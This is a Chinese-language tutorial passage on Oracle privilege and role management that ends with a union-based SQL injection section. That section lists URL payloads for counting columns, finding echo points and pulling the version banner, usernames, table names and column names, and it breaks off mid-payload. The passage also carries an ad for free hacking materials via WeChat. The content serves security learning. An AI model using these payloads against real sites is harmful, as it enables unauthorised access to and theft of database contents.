數據庫注入提權總結(四)

Oracle

Oracle權限分類

權限是用戶對一項功能的執行權力。在Oracle中,根據系統的管理方式不同,將 Oracle 權限分爲系統權限與實體權限兩類。系統權限是指是否被授權用戶可以連接到數據庫上,在數據庫中可以進行哪些系統操作。而實體權限是指用戶對具體的模式實體 (schema) 所擁有的權限。

系統權限管理

系統權限:系統規定用戶使用數據庫的權限。(系統權限是對用戶而言)。

  • DBA:擁有全部特權,是系統最高權限,只有DBA纔可以創建數據庫結構

  • RESOURCE:擁有Resource權限的用戶只可以創建實體,不可以創建數據庫結構

  • CONNECT:擁有Connect權限的用戶只可以登錄Oracle,不可以創建實體,不可以創建數據庫結構

對於普通用戶:授予connect,resource權限

對於DBA用戶:授予connect,resource,dba權限

-- 系統權限授予命令:
系統權限只能由DBA用戶授出,也就是sys,system(這兩個用戶是最開始的兩個DBA用戶)
授權命令:grant connect, resource, dba to username1 , username2...;
普通用戶通過授權可以具有與system相同的用戶權限,但永遠不能達到與sys用戶相同的權限,system用戶的權限也可以被回收
回收授權命令:revoke connect, resource, dba from system;

-- 查詢用戶擁有那些權限:
select * from dba_role_privs;
select * from dba_sys_privs;
select * from role_sys_privs;

-- 查詢自己擁有那些系統權限
select * from session_privs;

-- 刪除用戶
drop user [username] cascade; -- 加上cascade則將用戶連同其創建的東西全部刪除

-- 系統權限傳遞
增加 WITH ADMIN OPTION 選項,則得到的權限可以傳遞。
grant connect, resorce to user50 with admin option;

-- 系統權限回收,只能由DBA用戶回收
revoke connect, resource, dba from system;

-- 說明
1. 如果使用WITH ADMIN OPTION爲某個用戶授予系統權限,那麼對於被這個用戶授予相同權限的所有用戶來說,取消該用戶的系統權限並不會級聯取消這些用戶的相同權限。
2. 系統權限無級聯,即A授予B權限,B授予C權限,如果A收回B的權限,C的權限不受影響;系統權限可以跨用戶回收,即A可以直接收回C用戶的權限。

實體權限管理

實體權限:某種權限用戶對其它用戶的表或視圖的存取權限。(是針對表或視圖而言的)。

  • select, update, insert, alter, index, delete, all //all 包括所有權限

  • execute // 執行存儲過程權限

-- 授權用戶表操作
grant select, update, insert on product to user02;
grant all on product to user02;
上述兩條命令是 除drop之外所有對 product表的操作授予 user02 用戶

-- 授予全部用戶表的操作權限
grant all on product to public; # all不包括 drop 權限

-- 實體權限傳遞
grant select, update on product to user02 with grant option;
user02得到權限,並可以傳遞。

-- 實體權限的回收
Revoke select, update on product from user02;
傳遞的權限將全部消失

-- 說明
1. 如果取消某個用戶的對象權限,那麼對於這個用戶使用WITH GRANT OPTION授予權限的用戶來說,同樣還會取消這些用戶的相同權限,也就是說取消授權時級聯的。

角色管理

-- 建立一個角色
create role role1;

-- 爲角色授權
grant create any table,create procedure to role1;

-- 授權角色給用戶
grant role1 to user1;

-- 查看角色所包含的權限
select * from role_sys_privs;

-- 創建帶有口令的角色(在生效帶有口令的角色時必須提供口令)
create role role1 identified by password1;

-- 修改角色,設置是否需要口令
alter role role1 not identified;
alter role role1 identified by password1;

-- 設置當前用戶要生效的角色
角色的生效是一個什麼概念呢?假設用戶a有b1,b2,b3三個角色,那麼如果b1未生效,則b1所包含的權限對於a來講是不擁有的,只有角色生效了,角色內的權限才作用於用戶,最大可生效角色數由參數MAX_ENABLED_ROLES設定;在用戶登錄後,oracle將所有直接賦給用戶的權限和用戶默認角色中的權限賦給用戶。
set role role1; # 使role1生效
set role role,role2; # 使role1,role2生效
set role role1 identified by password1; # 使用帶有口令的role1生效
set role all; # 使用該用戶的所有角色生效
set role none; # 設置所有角色失效
set role all except role1; # 除role1外的該用戶的所有其它角色生效。
select * from SESSION_ROLES; # 查看當前用戶的生效的角色。

-- 修改指定用戶,設置其默認角色
alter user user1 default role role1;
alter user user1 default role all except role1;

-- 刪除角色
drop role role1;
角色刪除後,原來擁用該角色的用戶就不再擁有該角色了,相應的權限也就沒有了。

-- 說明
1. 無法使用WITH GRANT OPTION爲角色授予對象權限
2. 可以使用WITH ADMIN OPTION 爲角色授予系統權限,取消時不是級聯

PL/SQL語言

PL/SQL 也是一種程序語言,叫做過程化 SQL 語言(Procedual Language/SQL)。

PL/SQL 是 Oracle 數據庫對 SQL 語句的擴展。在普通 SQL 語句的使用上增加了編程語言的特點,所以 PL/SQL 就是把數據操作和查詢語句組織在 PL/SQL 代碼的過程性單元中,通過邏輯判斷、循環等操作實現複雜的功能或者計算的程序語言。在 PL/SQL 編程語言是由甲骨文公司在 20 世紀 80 年代,作爲 SQL 程序擴展語言和 Oracle 關係數據庫開發。

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備註 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

基本結構如下:

DECLARE
   
BEGIN
   
EXCEPTION
   
END;

SQL 注入需注意的規則

  • Oracle 使用查詢語言獲取需要跟上表名,這一點和 Access 類似,沒有表的情況下可以使用 dual 表,dual 是 Oracle 的虛擬表,用來構成 select 的語法規則,Oracle 保證 dual 裏面永遠只有一條記錄。

  • Oracle 的數據庫類型是強匹配,所以在 Oracle 進行類似 Union 查詢數據時必須讓對應位置上的數據類型和表中的列的數據類型是一致的,也可以使用 NULL 代替某些無法快速猜測出的數據類型位置,這一點和 SQL Server 類似。

  • Oracle 和 mysql 不一樣,分頁中沒有 limit,而是使用三層查詢嵌套的方式實現分頁 例如: SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >=0

  • Oracle 的單行註釋符號是 --,多行註釋符號 /**/

  • Oracle 數據庫包含了幾個系統表,這幾個系統表裏存儲了系統數據庫的表名和列名,如 user_tab_columns,all_tab_columns,all_tables,user_tables 系統表就存儲了用戶的所有的表、列名,其中 table_name 表示的是系統裏的表名,column_name 裏的是系統裏存在的列名。

  • Oracle 使用 || 拼接字符串(在 URL 中使用編碼 %7c 表示),concat() 函數也可以實現兩個字符串的拼接

聯合查詢注入

Payload空格有問題,可以放在vscode中查看

# 判斷注入點
所有數據庫方式都一樣

# 判斷列數
依舊提交 order by 去猜測顯示當前頁面所用的 SQL 查詢了多少個字段,也就是確認查詢字段數。
?id=1 order by 3 --+
?id=1 order by 4 --+

# 判斷回顯點
?id=-1 union select null,null,null from dual --+
?id=-1 union select 1,'2','3' from dual --+

# 獲取數據庫基本信息
?id=-1 union select 1,(select banner from sys.v_$version where rownum=1 ),'3' from dual --+
?id=-1 union select 1,(select instance_name from v_$instance),'3' from dual --+

# 獲取數據庫名,即用戶名
Oracle 沒有數據庫名的概念,所謂數據庫名,即數據表的擁有者,也就是用戶名。
1. 獲取第一個用戶名
?id=-1 union select 1,(select username from all_users where rownum=1),'3' from dual --+
2. 獲取第二個用戶名
?id=-1 union select 1,(select username from all_users where rownum=1 and username not in ('SYS')),'3' from dual --+
     
3. 獲取當前用戶名
?id=-1 union select 1,(SELECT user FROM dual),'3' from dual --+

# 獲取表名
1. 獲取Test用戶第一張表
?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST'),'3' from dual --+
2. 獲取Test用戶第二張表
?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST' and table_name<>'NEWS'),'3' from dual --+

# 獲取字段名
?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章